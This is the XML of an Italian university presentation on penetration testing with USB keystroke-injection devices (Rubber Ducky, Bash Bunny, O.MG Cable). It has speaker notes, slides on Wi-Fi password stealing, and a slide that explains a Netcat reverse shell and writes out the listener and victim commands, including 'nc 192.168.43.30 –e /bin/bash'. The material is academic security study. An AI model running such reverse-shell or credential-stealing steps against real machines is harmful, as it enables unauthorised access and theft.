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1_D13833FB.xml" ContentType="application/vnd.ms-powerpoint.comments+xml"/>
  <Override PartName="/ppt/comments/modernComment_125_7C8C2854.xml" ContentType="application/vnd.ms-powerpoint.comments+xml"/>
  <Override PartName="/ppt/comments/modernComment_126_CE6D94D6.xml" ContentType="application/vnd.ms-powerpoint.comments+xml"/>
  <Override PartName="/ppt/comments/modernComment_12B_C3E4CCDF.xml" ContentType="application/vnd.ms-powerpoint.comments+xml"/>
  <Override PartName="/ppt/comments/modernComment_124_9998D5B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93" r:id="rId4"/>
    <p:sldId id="294" r:id="rId5"/>
    <p:sldId id="296" r:id="rId6"/>
    <p:sldId id="297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7" r:id="rId15"/>
    <p:sldId id="311" r:id="rId16"/>
    <p:sldId id="312" r:id="rId17"/>
    <p:sldId id="313" r:id="rId18"/>
    <p:sldId id="314" r:id="rId19"/>
    <p:sldId id="317" r:id="rId20"/>
    <p:sldId id="318" r:id="rId21"/>
    <p:sldId id="319" r:id="rId22"/>
    <p:sldId id="320" r:id="rId23"/>
    <p:sldId id="322" r:id="rId24"/>
    <p:sldId id="325" r:id="rId25"/>
    <p:sldId id="326" r:id="rId26"/>
    <p:sldId id="327" r:id="rId27"/>
    <p:sldId id="328" r:id="rId28"/>
    <p:sldId id="292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F90643-6998-F152-C98B-66F05E98930F}" name="Massimiliano Buccolini" initials="MB" userId="f631a0b42d10312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modernComment_101_D13833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107077-48B7-41B5-BC89-9B19F1012501}" authorId="{35F90643-6998-F152-C98B-66F05E98930F}" created="2022-10-23T08:18:22.946">
    <pc:sldMkLst xmlns:pc="http://schemas.microsoft.com/office/powerpoint/2013/main/command">
      <pc:docMk/>
      <pc:sldMk cId="3510121467" sldId="257"/>
    </pc:sldMkLst>
    <p188:txBody>
      <a:bodyPr/>
      <a:lstStyle/>
      <a:p>
        <a:r>
          <a:rPr lang="it-IT"/>
          <a:t>Il discorso del rapporto di fiducia tra l'uomo e la macchina è un classico dell'informatica.
Questo rapporto non è certo bidirezionale poiché, se noi siamo in grado di dubitare di una macchina e delle sue capacità, un computer ha una fiducia incondizionata nell'uomo ed esegue tutti i suoi ordini non curandosi neanche di eventuali errori commessi.
Il problema però è che la macchina non riconosce neanche se è il suo possessore a scrivere effettivamente, quindi possiamo dire che un computer si fida, più che dell''uomo, degli input che gli vengono dati.  </a:t>
        </a:r>
      </a:p>
    </p188:txBody>
  </p188:cm>
</p188:cmLst>
</file>

<file path=ppt/comments/modernComment_124_9998D5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E4EF4FD-E3DF-40F2-ABC7-E251C845F0DA}" authorId="{35F90643-6998-F152-C98B-66F05E98930F}" created="2022-10-23T09:14:24.10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76930227" sldId="292"/>
      <ac:picMk id="4" creationId="{301D5F70-1BEE-57EE-B9BB-D58BC1C680D0}"/>
    </ac:deMkLst>
    <p188:txBody>
      <a:bodyPr/>
      <a:lstStyle/>
      <a:p>
        <a:r>
          <a:rPr lang="it-IT"/>
          <a:t>In conclusione si può dire che, pur avendo noi provato alcuni strumenti che non sono i più moderni e all'avanguardia del settore nello specifico,  questi dispositivi di Keystroke injection si sono dimostrati duttili e potenzialmente molto utili per un eventuale procedura di penetration testing. Anche se magari non da soli ma accompagnati da altre tecniche e mstrumenti da pentester e dopo un buon utilizzo dell'ingegneria sociale per aprire le porte chiuse tra noi e la macchina bersaglio.
In futuro, inoltre, sarà probabilmente molto utile approfondire questo argomento dato che anche il parlamento europeo recentemente ha leeggiferato per uniformare lo standard USB-C a tutti i device elettronici.
Questo si tradurrà probabilmente in un maggiore sfruttamento di questa vulnerabilità e in un bisogno maggiore di gente che sappia come proteggerla.</a:t>
        </a:r>
      </a:p>
    </p188:txBody>
  </p188:cm>
</p188:cmLst>
</file>

<file path=ppt/comments/modernComment_125_7C8C28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39F7F0D-CA8E-4330-9A0D-ED19A76DE5A2}" authorId="{35F90643-6998-F152-C98B-66F05E98930F}" created="2022-10-23T08:26:08.823">
    <pc:sldMkLst xmlns:pc="http://schemas.microsoft.com/office/powerpoint/2013/main/command">
      <pc:docMk/>
      <pc:sldMk cId="2089560148" sldId="293"/>
    </pc:sldMkLst>
    <p188:txBody>
      <a:bodyPr/>
      <a:lstStyle/>
      <a:p>
        <a:r>
          <a:rPr lang="it-IT"/>
          <a:t>E questi input vengono mandati, al giorno d'oggi, quasi esclusivamente tramite HID. Che cos'è un Human Interface Device?
Uno standard introdotto da Microsoft nel 1996: prima di allora tutti i device di controllo erano dotati di drive specifici da installare manualmente, con l'HID una volta inserito un mouse o una tastiera o qualsiasi altro dispositivo simile il computer lo riconosce e lo configura automaticamente.
Attualmente quasi tutti gli HID sono USB-HID , ovvero utilizzano per comunicare le classiche porte USB</a:t>
        </a:r>
      </a:p>
    </p188:txBody>
  </p188:cm>
</p188:cmLst>
</file>

<file path=ppt/comments/modernComment_126_CE6D94D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6EEB70C-C9E0-4631-A206-F16F5F41B716}" authorId="{35F90643-6998-F152-C98B-66F05E98930F}" created="2022-10-23T08:29:18.699">
    <pc:sldMkLst xmlns:pc="http://schemas.microsoft.com/office/powerpoint/2013/main/command">
      <pc:docMk/>
      <pc:sldMk cId="3463288022" sldId="294"/>
    </pc:sldMkLst>
    <p188:txBody>
      <a:bodyPr/>
      <a:lstStyle/>
      <a:p>
        <a:r>
          <a:rPr lang="it-IT"/>
          <a:t>Ovviamente, questo uso massiccio di USB è una comodità per noi, ma anche per gli hacker che si approfittano della fiducia della macchina trasformandola in una vulnerabilità...</a:t>
        </a:r>
      </a:p>
    </p188:txBody>
  </p188:cm>
</p188:cmLst>
</file>

<file path=ppt/comments/modernComment_12B_C3E4CC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B60A6D1-E5CD-4AA3-B0CE-C17071015657}" authorId="{35F90643-6998-F152-C98B-66F05E98930F}" created="2022-10-23T09:01:39.298">
    <pc:sldMkLst xmlns:pc="http://schemas.microsoft.com/office/powerpoint/2013/main/command">
      <pc:docMk/>
      <pc:sldMk cId="3286551775" sldId="299"/>
    </pc:sldMkLst>
    <p188:txBody>
      <a:bodyPr/>
      <a:lstStyle/>
      <a:p>
        <a:r>
          <a:rPr lang="it-IT"/>
          <a:t>Durante lo studio ho cercato di tracciare e dividere in alcune fasi il procedimento ideale di un penetration test con Rubber Ducky...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998F09-2F20-0A3E-61BF-F925BA85B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6C0516-2EA9-1077-176E-D4A3067FF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ED3031-700F-77CC-E705-ED231439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763D-89DD-4FF7-80AB-A10A400CB036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E377F3-3788-BBD3-382E-9F398670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301FC4-EA68-15F9-609C-50426A20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EE79-F69E-4ED9-A793-06AC87D41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57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87665-EA14-1A29-CA88-DF2EC345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2BE353-5F05-4AC6-1EA9-A1F173D68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504579-FC1C-4B2B-74CB-1F793DFD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763D-89DD-4FF7-80AB-A10A400CB036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FB6CB-E6C5-3161-73F7-7C5D4F63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DD06F9-B689-CBE2-125E-187353BE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EE79-F69E-4ED9-A793-06AC87D41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66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F2CD6C-68F6-8BA4-1942-4CEB22BE5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44DF6F-CFB7-F90E-08F8-45323F6A6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9340EC-0BCF-2E11-B27D-145BC41A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763D-89DD-4FF7-80AB-A10A400CB036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E1DF3F-2448-26A4-26EB-3C0E9F74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7FE08B-1ABE-C5B3-7802-48DBC03F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EE79-F69E-4ED9-A793-06AC87D41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69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EC042-8332-98B5-8B40-025219BD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3A8494-4389-0BDF-904F-36DD369C4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93B9A3-3017-7DF6-A778-F32C18B8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763D-89DD-4FF7-80AB-A10A400CB036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E569A2-DE8E-0E20-F365-A1297B2C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D07D54-010C-9D1A-AAC2-ED81803D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EE79-F69E-4ED9-A793-06AC87D41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70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AA3549-F728-79A9-3FDE-89DAB6D8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44E935-3C63-7A9C-4031-2D4D61B15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03E4E7-6D1C-E8A2-0E26-BEAF8882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763D-89DD-4FF7-80AB-A10A400CB036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6E5059-D093-DD88-4BD2-BA399818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D2A817-7B16-A52E-474D-22CD3239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EE79-F69E-4ED9-A793-06AC87D41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30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310B8-173F-5988-42D9-A56B8CD9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44558D-EA82-D268-9A6F-D7A08147E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F1096C-8277-372B-8017-818DC005C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4BFC02-1F04-910F-5BED-DA6DA715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763D-89DD-4FF7-80AB-A10A400CB036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B7CB18-6196-076D-2D9B-533EB40C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FDAABA-9372-3DE2-C628-BAB50921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EE79-F69E-4ED9-A793-06AC87D41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52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490CDC-0F41-64DB-9E54-DF340FFB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0E526E-DC78-666D-3A21-25EE2495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364D7D-EF6B-78B8-A576-FEC30AD5D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48E832F-F337-0EB9-530C-0A61FE18A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94C2E6-00DF-E9A5-6692-3E9915279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783E609-6341-91AF-62AF-98D4FFB1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763D-89DD-4FF7-80AB-A10A400CB036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B4CF110-96C9-89C6-ED32-FB8391B3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22F372-4804-F815-2F8C-93B82D7E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EE79-F69E-4ED9-A793-06AC87D41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6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E8953-A812-4517-9B5F-EA0D3BFC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8F812C-EF58-E9A9-15D8-F92F29C3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763D-89DD-4FF7-80AB-A10A400CB036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ACB3E2-FD77-A42C-78F7-603E1330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E9C763-969F-D85F-4A60-7B7CAFE9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EE79-F69E-4ED9-A793-06AC87D41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62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A108AB-BB9F-A590-90C8-FC30B74E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763D-89DD-4FF7-80AB-A10A400CB036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5CF03A-0D11-D166-9D10-18245758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C24005-E93E-2EFB-12CD-0324D90E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EE79-F69E-4ED9-A793-06AC87D41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14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4E8DA-433A-4FF5-D1F4-8436F6EE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5916F-6766-FFF6-7EFE-776259095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38CCC3-E533-95F3-3F96-B75048F59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FC7C40-19DF-2273-F068-157EAC06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763D-89DD-4FF7-80AB-A10A400CB036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A075F2-1848-2A77-2438-0790EBEE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2C3B21-BF45-07E3-831C-BDF45097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EE79-F69E-4ED9-A793-06AC87D41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55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3E5E9A-587A-1B21-6786-B602E058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747B924-605E-98AC-3B1F-115127A0A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5C43DA-DD52-08C6-A0D5-1736A633A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C17CDA-217C-E93A-DC4C-D742F551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763D-89DD-4FF7-80AB-A10A400CB036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4A8AEB-B4C2-5EF2-9320-227A56D1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C522C5-AAC6-E7C0-55A3-A7B864C3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DEE79-F69E-4ED9-A793-06AC87D41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15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9ABE00D-60FB-92AC-1138-03517DD1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FAECD8-C7E7-ED48-9DAA-437DF44C5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C830DF-00F2-96AD-CF52-758B9615B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763D-89DD-4FF7-80AB-A10A400CB036}" type="datetimeFigureOut">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>23/10/2022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F43350-AB62-8093-59A6-BCDA4256E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08F6EE-3F09-EE1A-3483-F971515E8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DEE79-F69E-4ED9-A793-06AC87D414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54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1_D13833FB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gif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microsoft.com/office/2018/10/relationships/comments" Target="../comments/modernComment_124_9998D5B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8/10/relationships/comments" Target="../comments/modernComment_125_7C8C285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26_CE6D94D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2B_C3E4CCDF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5D18650-F30A-0766-52DC-79B59AE09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56" y="141732"/>
            <a:ext cx="1896488" cy="235690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153791-3FF9-F5A9-7D2D-7DEA5F46A92D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3759329" y="2463684"/>
            <a:ext cx="5962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Scuola di scienze  e tecnologie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F36FCC-2E04-F96F-632A-61682D66335E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3933589" y="2905780"/>
            <a:ext cx="451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Corso di laurea in Informatica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27CDEF-D86D-A7E6-50EF-7AC3BA891F0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="849085" y="5730141"/>
            <a:ext cx="357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Massimiliano Buccolini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2566FF-CBC5-5D43-0DAD-305F0503F669}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8449237" y="5242516"/>
            <a:ext cx="364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Relatore:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>Fausto Marcantoni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B50A6A0-A5D6-E0C1-B688-6E9F1084B877}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2043691" y="3835102"/>
            <a:ext cx="79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effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Penetration Test</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>with USB Keystroke Injection Attack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3408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37" y="69088"/>
            <a:ext cx="5298622" cy="1067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latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Guadagnare l’accesso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59C75ED-4F1F-27AB-172F-10A1F27D1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r="4643" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="431"/>
            <a:ext cx="7229452" cy="640831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BA1432-A8EA-7A81-FE66-BE8152AA019E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8220693" y="1213620"/>
            <a:ext cx="2942813" cy="2075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Ottenere accesso fisico per  inserire Rubber Ducky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O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Convincere un complice inconsapevole con il Social Engineering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DD2A59-EF37-FEF4-609C-D25CCDD68C75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7504337" y="3498694"/>
            <a:ext cx="444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/>
              <a:t>Mantenere l’accesso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AC5C41-9546-0F20-59F1-2CC6A080B36C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7968342" y="4465218"/>
            <a:ext cx="3869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Aprire delle backdoor o eseguire un Reverse Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7064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228" y="83501"/>
            <a:ext cx="5298622" cy="1067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5400"/>
              <a:t>Scripting e Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000"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BA1432-A8EA-7A81-FE66-BE8152AA019E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771399" y="1443898"/>
            <a:ext cx="10649198" cy="3520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/>
              <a:t>Il “vero” obiettivo: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Testare alcuni script interessanti per studiare e potenzialità di RD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Non un vero Pentest: la fase di ricognizione è stata trascurata e l’obiettivo degli script è stato un ambiente di testing standard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0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320" y="-160498"/>
            <a:ext cx="7919356" cy="12554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7200"/>
              <a:t>Ambiente di testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="400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6B522AE-9B69-8575-A682-7EF3B84AF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" y="1116868"/>
            <a:ext cx="7253836" cy="4080283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861B1F5F-1969-1012-77A0-44BFCDA0C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00" y="1343607"/>
            <a:ext cx="4647798" cy="58921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C82F383-675C-3BF5-A34E-589FE7DAF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072" y="4268463"/>
            <a:ext cx="2257425" cy="112871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CEC531B-E944-1824-1E06-1AE6457BC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86" y="3648254"/>
            <a:ext cx="1184565" cy="118456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1E5CF0D-8133-537F-7368-CCE1A48A9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2106509"/>
            <a:ext cx="2428875" cy="13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629" y="110567"/>
            <a:ext cx="7919356" cy="10374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7200"/>
              <a:t>Gli Infiltrati</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="400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monitor, schermo, elettronico&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0757CA8-B519-B860-0096-191A73C3E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848100"/>
            <a:ext cx="4747385" cy="2380621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9686646-BD2C-5C10-3063-B7F4CFE4D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" y="1268929"/>
            <a:ext cx="5503364" cy="32678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72D323F-69A2-4A60-8FEB-49DCE8972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268929"/>
            <a:ext cx="34099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497" y="263405"/>
            <a:ext cx="7919356" cy="10374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7200"/>
              <a:t>Ducky Script</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="400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egnaposto contenuto 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ED507A5-AF5A-1E26-9D83-07A9A6E0C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088" y="1564231"/>
            <a:ext cx="7682291" cy="38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5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489" y="801219"/>
            <a:ext cx="5384673" cy="10374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5400"/>
              <a:t>Wi-Fi Password Stealer - 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="540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ADBB7F-5B2E-0A3E-CA4F-7B72AAE25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166" y="2350579"/>
            <a:ext cx="8002906" cy="25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31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8887"/>
            <a:ext cx="7081837" cy="10374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5400"/>
              <a:t>Wi-Fi Password Stealer - 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="540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577DE5B-08F2-2DF1-7192-60A822B95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84" y="1176310"/>
            <a:ext cx="7700012" cy="2014538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0EBE61B-636D-14B4-A9BC-82E08D3EB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04" y="1217939"/>
            <a:ext cx="5384673" cy="49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8887"/>
            <a:ext cx="7081837" cy="10374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5400"/>
              <a:t>Wi-Fi Password Stealer - 3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="540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95F5133-5620-C051-2017-EBC91E90C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9" y="1076704"/>
            <a:ext cx="8201205" cy="1214438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6C41F062-CDD1-4294-03C3-99EB5C6CE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0" y="2585440"/>
            <a:ext cx="5274050" cy="2387647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BE71DAAD-FBAE-8C0A-2B4B-7C7058E0E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83" y="2675418"/>
            <a:ext cx="6106068" cy="2283564"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Elemento grafico 13" descr="Freccia a destra con riempimento a tinta unita">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D16B613D-20F9-93FB-F756-76B2B0B32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6133" y="3322063"/>
            <a:ext cx="133368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4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8887"/>
            <a:ext cx="7081837" cy="10374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5400"/>
              <a:t>Wi-Fi Password Stealer - 4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="540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C3F849-5A1F-90AA-702C-75EFCD9BC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3" y="1048169"/>
            <a:ext cx="9739313" cy="19133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6512AB1-D101-EFD0-9BF7-96D5B9E0D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2913524"/>
            <a:ext cx="9915529" cy="316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0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00" y="221626"/>
            <a:ext cx="10250043" cy="10374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5400"/>
              <a:t>Che cos’è un Reverse Shell con Netcat?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="540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Elemento grafico 2" descr="Portatile con riempimento a tinta unita">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9E48707-1E6B-E20D-5539-CC52828B1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2353" y="2617851"/>
            <a:ext cx="1571625" cy="1571625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Elemento grafico 7" descr="Computer con riempimento a tinta unita">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2607F6C6-DFD5-00E3-F6C6-C44318465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6200" y="2647949"/>
            <a:ext cx="1438275" cy="1438275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Elemento grafico 9" descr="Freccia a destra con riempimento a tinta unita">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DE8F320-FA0B-8046-73AA-F682ADEAB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334000" y="2496351"/>
            <a:ext cx="1652588" cy="165258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3D1A3B-4F3D-33A2-38A8-13AAD5490D79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6986588" y="2040632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Vittima</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>192.168.1.1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E4ADBB-033B-013B-366C-C6F1C075989E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2636090" y="2125282"/>
            <a:ext cx="27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/>
              <a:t>Attaccante</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>192.168.43.30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1C14B4-3398-988F-7C85-104E9928F6AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3067050" y="4120363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nc –lvp 4444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6EBDC8-4997-2395-851C-32FBED734D3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6984492" y="4070401"/>
            <a:ext cx="323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Nc 192.168.43.30 –e /bin/bash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4C46CBD-4EE8-748F-09E5-34BA255276D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3392424" y="4736592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C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ascolta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79CBF37-3DFD-609C-C19C-7C99B423786C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7434072" y="4693541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00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ricerca la connessione</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379807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BB67C96-833F-075B-1867-418854D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008" y="442889"/>
            <a:ext cx="5754896" cy="885444"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="5400" dirty="0"/>
              <a:t>Trust (Fiducia)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Segnaposto contenuto 6" descr="Stretta di mano con riempimento a tinta unita">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2649892C-05F1-C973-B841-65E6028FD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605" y="1328333"/>
            <a:ext cx="3876165" cy="387616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43C9A3-13CB-1838-059F-4FE299B4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692" y="1726973"/>
            <a:ext cx="5754896" cy="2846685"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Noi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> possiamo dubitare della macchina, non viceversa.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Il computer ha una cieca fiducia in noi ed esegue ciò che gli viene ordinato anche in presenza dell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000"/>
              <a:t>’errore umano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>La macchina non riconosce il furto d’identità.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EF99A4-2AA8-6A43-371F-D55756007119}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2705100" y="4972299"/>
            <a:ext cx="8377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Di cosa si fida in realtà la macchina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35101214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2769F2A-D2EA-6E65-24F6-F81AF2D7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Linux Ducky Reverse Shell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2422C7-E9F6-4554-D59E-876887559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95" y="2200268"/>
            <a:ext cx="7748688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1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2769F2A-D2EA-6E65-24F6-F81AF2D7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218" y="33335"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Altri Strumenti - Hack5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6519866-090F-F665-A413-653650D66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6" y="1686701"/>
            <a:ext cx="2628243" cy="262824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7FF977-E357-79EA-AD46-D9DFC4959AB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="515579" y="1302760"/>
            <a:ext cx="429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/>
              <a:t>Bash Bunny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D7CA94-0F1F-9937-8EF2-F77858122E0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3162298" y="2314731"/>
            <a:ext cx="2933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Non ha bisogno di encoder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Può contenere fino a 3 payload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Dimensioni maggiori e latenza di esecuzione</a:t>
            </a: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9" name="Elemento grafico 8" descr="Pollice abbassato con riempimento a tinta unita">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9F71F26-E63B-29BD-4D59-4D915FD50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8264" y="3957191"/>
            <a:ext cx="891506" cy="891506"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Elemento grafico 10" descr="Segna Pollice su con riempimento a tinta unita">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEFF2F18-57A5-127A-EF11-170DF7D63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4798" y="2804691"/>
            <a:ext cx="914400" cy="9144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1334F65-5B77-5F42-F794-B481EBFCF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793" y="1981568"/>
            <a:ext cx="914479" cy="91447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9389B84-62FF-D8BF-2073-92D117D7D9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86" y="2204695"/>
            <a:ext cx="2828925" cy="161925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29C3A19-A901-C21A-30DF-BA0528EBFD4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6237068" y="1283249"/>
            <a:ext cx="429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/>
              <a:t>O.MG Cable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B29FE77-1CE0-FF2B-A7C5-8C357ABEABFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
